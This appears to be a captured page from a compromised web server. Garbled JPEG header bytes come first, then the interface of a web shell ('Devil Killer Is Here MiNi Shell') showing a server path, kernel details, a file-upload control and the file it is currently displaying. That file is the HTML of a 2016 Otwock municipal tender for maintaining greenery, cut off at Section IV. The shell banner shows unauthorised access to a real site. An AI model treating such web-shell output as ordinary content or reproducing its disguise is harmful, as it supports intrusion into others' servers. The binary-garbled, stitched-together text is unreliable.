JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160325/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160325/31487-N-2016.html

<p class="kh_header"><b>Otwock: Utrzymanie i pielęgnacja zieleni na terenie miasta Otwocka w 2016 roku.</b><br>
<b>Numer ogłoszenia: 31487 - 2016; data zamieszczenia: 25.03.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Otwock , ul. Armii Krajowej 5, 05-400 Otwock, woj. mazowieckie, tel. 022 7792001, faks 022 7794225.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.otwock.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie i pielęgnacja zieleni na terenie miasta Otwocka w 2016 roku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 4.1. Przedmiotem zamówienia jest wykonywanie na terenie  miasta Otwocka - w pasach  dróg gminnych, w parku miejskim, na skwerach oraz na innych terenach  należących do Gminy Otwock 
lub będących  w  jej  władaniu - prac  w zakresie pielęgnacji i sadzenia  roślin, utrzymania 
i pielęgnacji terenów zieleni.  
4.2. Zakres  przedmiotu  zamówienia  obejmuje:
1)sadzenie kwiatów jednorocznych i dwuletnich  na rabatach i w wazach  - materiał roślinny 
jakości I, gatunki  takie jak: aksamitka, begonia stale kwitnąca, szałwia, żeniszek, dalia, 
pelargonia, mrozy, bratek  -  z przygotowaniem  podłoża, uzupełnieniem  ziemi  urodzajnej, 
podlaniem  i  wywozem  odpadów,  
2)obsadzenie kwiatami doniczek wiszących na latarniach i wież stojących -  dobór materiału roślinnego jakości I, gatunki takie jak pelargonia, surfinia i petunia,  o pokroju zwisającym, dającego natychmiastowy efekt wizualny, bez konieczności oczekiwania na rozwój kwiatów (kolorystyka kwiatów do uzgodnienia z Zamawiającym) - przygotowanie podłoża z ziemi
ogrodniczej przeznaczonej do nasadzeń kwiatów, wywóz odpadów, 
3) sadzenie bylin - materiał roślinny jakości I, gatunki takie jak: liliowiec pośredni, szałwia omszona, żurawka  amerykańska - z bryłą korzeniową w pojemniku P9,  z przygotowaniem
podłoża, zaprawą  dołków ziemią  urodzajną, podlaniem  i wywozem  odpadów,
4)sadzenie traw ozdobnych - materiał roślinny jakości I, gatunki takie jak: trzęślica modra, 
trzciniczek ostrokwiatowy - z bryłą  korzeniową w pojemniku C1, z przygotowaniem podłoża, zaprawą dołków ziemią  urodzajną,  podlaniem i wywozem odpadów,
5)pielęgnację  kwiatów jednorocznych i dwuletnich  na  rabatach i w wazach,  tj. odchwaszczanie, spulchnianie  ziemi, przycinanie, usuwanie przekwitniętych  kwiatostanów, nawożenie, ochrona przed chorobami i szkodnikami, usunięcie roślin po sezonie i przekopanie ziemi, wywóz odpadów, 
6)pielęgnację kwiatów w doniczkach wiszących i wież kwiatowych, tj. podlewanie, zastosowanie odpowiednich substancji odżywczych, ochrona przed chorobami i szkodnikami,przycinanie, usuwanie przekwitniętych kwiatostanów, usunięcie roślin po sezonie, wywóz 
odpadów,
7)pielęgnację krzewów i traw ozdobnych,  tj. przycinanie,  usuwanie chwastów,  nawożenie, 
wywóz odpadów,
8) podlewanie kwiatów jednorocznych i dwuletnich na rabatach i w wazach,
9) podlewanie krzewów i traw ozdobnych, 
10) posadzenie cebulek  tulipanów,  tj. usunięcie  roślin po sezonie letnim, przygotowanie podłoża, uzupełnienie ziemi urodzajnej, wywóz odpadów,
11) sadzenie krzewów liściastych - materiał roślinny jakości I, gatunki  takie jak:  berberys, 
tawuła japońska, forsycja, pęcherznica -  z bryłą korzeniową w pojemniku C3, z wykopaniem dołków, zaprawą  dołków ziemią urodzajną, podlaniem,  uporządkowaniem terenu, wywozem odpadów, 
12) sadzenie krzewów  iglastych - materiał roślinny jakości I, gatunki takie jak: jałowiec płożący, 
jałowiec pośredni -  z bryłą korzeniową w pojemniku C3,  z wykopaniem dołków, zaprawą dołków ziemią urodzajną, podlaniem, uporządkowaniem terenu, wywozem odpadów, 
13) rozplantowanie kory pod  nasadzenia o grubości  około 3 cm, 
14) sadzenie żywopłotów - materiał roślinny  jakości I, gatunki takie jak: liguster, forsycja -  
z wykopaniem  rowów,  zaprawą  rowów ziemią  urodzajną,  podlaniem,  uporządkowaniem terenu i wywozem odpadów,
15) przycinanie żywopłotów  z  trzech  stron i wywóz  odpadów, 
16) odchwaszczanie żywopłotów  i  wywóz  odpadów,              
17) zakładanie  trawników z wymianą  ziemi na ziemię urodzajną do głębokości 10 cm, zabiegi agrotechniczne zgodnie z normą i sztuką ogrodniczą, wysianie mieszanki traw, uwałowanie, przykrycie nasion warstwą ziemi urodzajnej, podlanie, zabezpieczenie przez zadeptaniem, 
wywóz  odpadów,
18) uzupełnienie  zniszczonych  trawników  z  przekopaniem  ziemi, dosianiem  trawy,  uwałowaniem,                       podlaniem, zabezpieczeniem przed zadeptaniem i wywozem  odpadów,
19)   koszenie  trawników,  wygrabienie skoszonej  trawy  i  wywóz  odpadów,
20)   koszenie  poboczy  ulic,  wygrabienie skoszonych chwastów, trawy i wywóz odpadów,
21)   koszenie rowów  odwadniających, wygrabienie skoszonych chwastów, trawy i wywóz odpadów,
             22)   skoszenie zrekultywowanego składowiska odpadów,  bez zbierania i wywozu odpadów,
             23)   grabienie liści na terenach  zieleni i wywóz odpadów,        
             24)   wywóz  odpadów  zielonych do regionalnej instalacji do przetwarzania odpadów komunalnych                       -  dotyczy odpadów zgromadzonych przez  mieszkańców  na  terenach  należących do Gminy                               Otwock  lub będących w jej władaniu.
       4.3.   Wyżej wymienione prace będą  realizowane w oparciu o zlecenia jednostkowe zawierające zakres 
         i  termin  wykonania,  przekazywane  przez  Zamawiającego  w  formie  pisemnej - przystąpienie do          realizacji  tych  prac  przez  Wykonawcę  nastąpi  w  terminie  dni  od  dnia  otrzymania  zlecenia          jednostkowego.
4.4.	W przypadku wypadów kwiatów na rabatach,  w wazach  i w doniczkach  Wykonawca zobowiązany jest uzupełniać rośliny na bieżąco i na własny koszt.
4.5.	Wywóz odpadów po koszeniu powinien odbywać się najpóźniej następnego dnia po zakończeniu każdego etapu koszenia.
4.6.	Wywóz  liści po grabieniu powinien odbywać się najpóźniej następnego dnia po zakończeniu
         każdego etapu grabienia.
4.7.	Wywóz odpadów powstałych podczas realizacji pozostałych prac wymienionych w punkcie 4.2.1-18
         powinien odbywać się natychmiast po ich zakończeniu.
4.8.	Współpraca z Zamawiającym podczas realizacji przedmiotu umowy, w tym zorganizowanie środków transportu  w  celu  wspólnej  kontroli  i  odbioru  wykonanych  prac.
       4.9.   Rozliczenie wykonanych  prac  następować  będzie  w  oparciu  o  zaoferowane  przez  Wykonawcę 
        w  ofercie  przetargowej  ceny  brutto:
1)	za posadzenie kwiatów jednorocznych i dwuletnich  na pow. 1m2 ,
2)	za obsadzenie kwiatami 1 doniczki wiszącej,
3)	za obsadzenie kwiatami 1 wieży o wys. 128 cm,
4)   za  obsadzenie kwiatami 1 wieży o wys. 152 cm,
    5)   za posadzenie 1 byliny,
    6)   za posadzenie 1 trawy ozdobnej,
    7)   za pielęgnację kwiatów jednorocznych i dwuletnich  na pow. 1 m2,
    8)   za pielęgnację kwiatów w doniczkach wiszących za 1 szt.,
    9)   za pielęgnację wież  kwiatowych za 1 szt.,
10)   za pielęgnację krzewów i traw ozdobnych  na pow. 1 m2, 
  11)   za podlanie kwiatów  jednorocznych i dwuletnich na  pow. 1 m2,
12)   za podlanie krzewów i traw ozdobnych  na  pow. 1 m2 ,
              13)   za posadzenie cebulek tulipanów  na pow. 1 m2,
  14)   za posadzenie 1 krzewu  liściastego,
  15)   za posadzenie  1 krzewu  iglastego,
  16)   za rozplantowanie kory  na  pow. 1 m2,
  17)   za posadzenie 1 mb  żywopłotu,
              18)   za przycięcie 1 mb  żywopłotu,
               19)   za odchwaszczenie  1 m2  żywopłotu,
  20)   za założenie 1m2  trawnika,
  21)   za uzupełnienie 1 m2 zniszczonego trawnika,
              22)   za skoszenie  1 m2  trawnika,
              23)   za  skoszenie  1 m2  pobocza ulicy,
              24)   za skoszenie  1 m2 rowu odwadniającego,
25)   za  skoszenie 1 m2 zrekultywowanego składowiska odpadów, 
26)   za  zagrabienie liści z pow. 1 m2  terenu  zieleni,       
  27)   za wywóz 1 tony odpadów zielonych. 
 4.10.  Ceny, o których mowa w punkcie  4.9. skalkulowane przez Wykonawcę powinny uwzględniać            wszystkie koszty związane z  prawidłowym wykonaniem przedmiotu zamówienia który został 
           określony w punkcie 4.2.,  łącznie z  materiałami, wywozem i przekazaniem  odpadów do regionalnej            instalacji do  przetwarzania odpadów komunalnych i ich unieszkodliwieniem  oraz należny podatek VAT.
 4.11.  Wykonawca zobowiązany jest do przekazywania Zamawiającemu dokumentów potwierdzających ilość            odpadów przyjętych przez regionalną instalację do przetwarzania odpadów w poszczególnych miesiącach.
 4.12.  Zakres  prac  przewidywany  do  wykonania  w  okresie  obowiązywania  umowy:
 1)  sadzenie kwiatów jednorocznych i dwuletnich  na  pow. 525 m2,  średnio 25 szt./m2, tj. 13 125 szt.,
 2)  obsadzenie kwiatami doniczek wiszących  (? o promieniu 30 cm) - 66 szt.,
             3)  obsadzenie  kwiatami wież  stojących o wys. 128 cm  (4 misy o średnicach  80,65,55 i 40 cm)  - 2 szt.,
             4)  obsadzenie kwiatami wież stojących o wys. 152 cm  (5 mis o średnicach  80,65,55,45 i 35 cm)  - 2szt.,
             5)  sadzenie bylin -  180 szt.,
             6)  sadzenie traw ozdobnych   -  240 szt.,
 7)  pielęgnacja kwiatów  jednorocznych i dwuletnich na pow. 525 m2  -  4 krotna,
 8)  pielęgnacja kwiatów  w doniczkach  wiszących  66 szt.  -  45  krotna,
 9)  pielęgnacja wież kwiatowych  4 szt.  -  45  krotna,
           10)  pielęgnacja  krzewów  i  traw  ozdobnych  na  pow.  5 400 m2  - 4 krotna, 
           11)  podlewanie  kwiatów  jednorocznych  i  dwuletnich  (około 7 l  wody na 1 m2) 
       na  pow. 525 m2  -  40  krotne,
           12)  podlewanie krzewów  i  traw  ozdobnych   (około 30 l  wody na 1 m 2 )  
     na  pow. 5 400 m2  -  6 krotne, 
           13)  posadzenie  4 000 szt. cebulek  tulipanów  na pow. 145 m2,
           14)  sadzenie krzewów liściastych  - 150 szt.,
           15)  sadzenie krzewów iglastych  - 20 szt.,    
           16)  rozplantowanie kory  na  pow. 600 m2,
           17)  sadzenie żywopłotów - 400 mb,  6 szt./mb,
           18)  przycinanie żywopłotów  - 4 600 mb  -  2 krotne, 
           19)  odchwaszczanie żywopłotów -  2 000 m2,                     
           20)  zakładanie trawników  o  pow. 1 000 m2,
           21)  uzupełnienie  zniszczonych  trawników  o  pow.  300 m2,   
           22)  koszenie trawników o pow.  140 000 m2   -  4 krotne,
           23)  koszenie poboczy ulic o pow. 90 000 m2   -  5  krotne,
           24)  koszenie rowów odwadniających o pow.  44 000 m2   -  3 krotne, 
           25)  skoszenie zrekultywowanego  składowiska  o  pow. 50 000 m2  -  1 krotne,
           26)  grabienie  liści na terenach  zieleni  o  pow.  130 000 m2  -  2 krotne,
           27)  wywóz odpadów zielonych  - 165 ton.
 4.13.   Zamawiający zastrzega, że podane ilości oraz częstotliwość wykonania prac nie są obligatoryjne i mogą              ulec zmianie w toku realizacji umowy w zależności od potrzeb i warunków atmosferycznych.          
 4.14.   Cena  za  wywóz  1 tony  odpadów  zielonych,  o  których  mowa  w  punkcie 4.2.24  skalkulowana              przez  Wykonawcę   powinna  uwzględniać  koszty  załadunku,  koszty  transportu  na  terenie  miasta,             koszty  wywozu  i  przekazania  odpadów  do  regionalnej  instalacji  do  przetwarzania  odpadów             komunalnych  i  ich  unieszkodliwienie  oraz  należny  podatek VAT.
 4.15.   Całkowite wynagrodzenie należne Wykonawcy będzie uzależnione od  rzeczywistej  ilości  prac             wykonanych  w okresie obowiązywania umowy.
 4.16.   Wykonawca, jako wytwórca odpadów w rozumieniu art. 3 ust. 1  pkt 32 ustawy z dnia 14 grudnia 2012 r. 
            o odpadach (Dz.U. z 2013 r., poz.21 z poźn. zm.) ma obowiązek gospodarowania powstałymi podczas             realizacji przedmiotu zamówienia odpadami, zgodnie z ustawą o odpadach..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość udzielenia do 50 % zamówień uzupełniających w trybie art. 67 ust. 1 pkt. 6 u.p.z.p. - polegającą na powtórzeniu tego samego rodzaju zamówienia, zgodnego z przedmiotem zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.30.00.00-3, 77.31.00.00-6, 77.34.20.00-9, 77.21.14.00-6, 77.21.15.00-7, 77.21.16.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy Wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium w wysokości 7.000,- zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli Wykonawca wykaże się wykonaniem  (a w przypadku świadczeń okresowych lub ciągłych również wykonywaniem)  w okresie ostatnich trzech lat przed upływem  terminu składania ofert, a jeżeli okres prowadzenia działalności jest  krótszy w tym  okresie co najmniej jednej  usługi  polegającej  na utrzymaniu i pielęgnacji zieleni (zawierającej co najmniej wykonywanie  takich prac  jak: sadzenie i pielęgnacja krzewów i żywopłotów lub sadzenie i  pielęgnacja kwiatów) o wartości minimalnej 200 000,00 PLN brutto. Wykonawca załączy  dowody potwierdzające, że wymieniona  usługa  została  wykonana (lub jest wykonywana)  należycie.
	(w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, w/w warunek musi spełniać co najmniej jeden z Wykonawców)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli Wykonawca wykaże iż dysponuje/będzie    dysponował co najmniej następującym sprzętem niezbędnym do realizacji zamówienia tj.: 
-  dwie piły spalinowe,
- łącznie dwanaście kosiarek i kos spalinowych,
- dwa samochody ze zdejmowanymi pojemnikami o pojemności nie mniejszej niż 7 m każdy,3 
(w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli Wykonawca wykaże iż dysponuje/będzie    dysponował co najmniej następującymi osobami zdolnymi do wykonania zamówienia :

co najmniej 1 osoba posiadająca wykształcenie ogrodnicze wyższe lub średnie w zakresie  urządzania  i  pielęgnacji  terenów  zieleni  oraz  pięcioletnią  praktykę  zawodową.  
	(w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>w wykazie należy wskazać co najmniej jedną usługę polegającą na utrzymaniu i pielęgnacji zieleni (zawierającej co najmniej wykonywanie  takich prac  jak: sadzenie i pielęgnacja krzewów i żywopłotów lub sadzenie i  pielęgnacja kwiatów) o wartości minimalnej 200 000,00 PLN brutto wraz z poświadczeniem, wykonaną (a w przypadku świadczeń okresowych lub ciągłych również wykonywaną) w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie.;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-Jeżeli Wykonawca, wykazując spełnienie warunków udziału w postępowaniu, polega na zasobach innych
podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, zobowiązany jest udowodnić Zamawiającemu,
iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym
celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
-W przypadku gdy Wykonawcę reprezentuje Pełnomocnik (dotyczy również Wykonawców
wspólnie ubiegających się o udzielenie zamówienia), do oferty musi zostać załączone
pełnomocnictwo, określające jego zakres, podpisane przez osoby uprawnione do
reprezentowania Wykonawcy. Pełnomocnictwo należy przedłożyć w oryginale lub kopii poświadczonej notarialnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
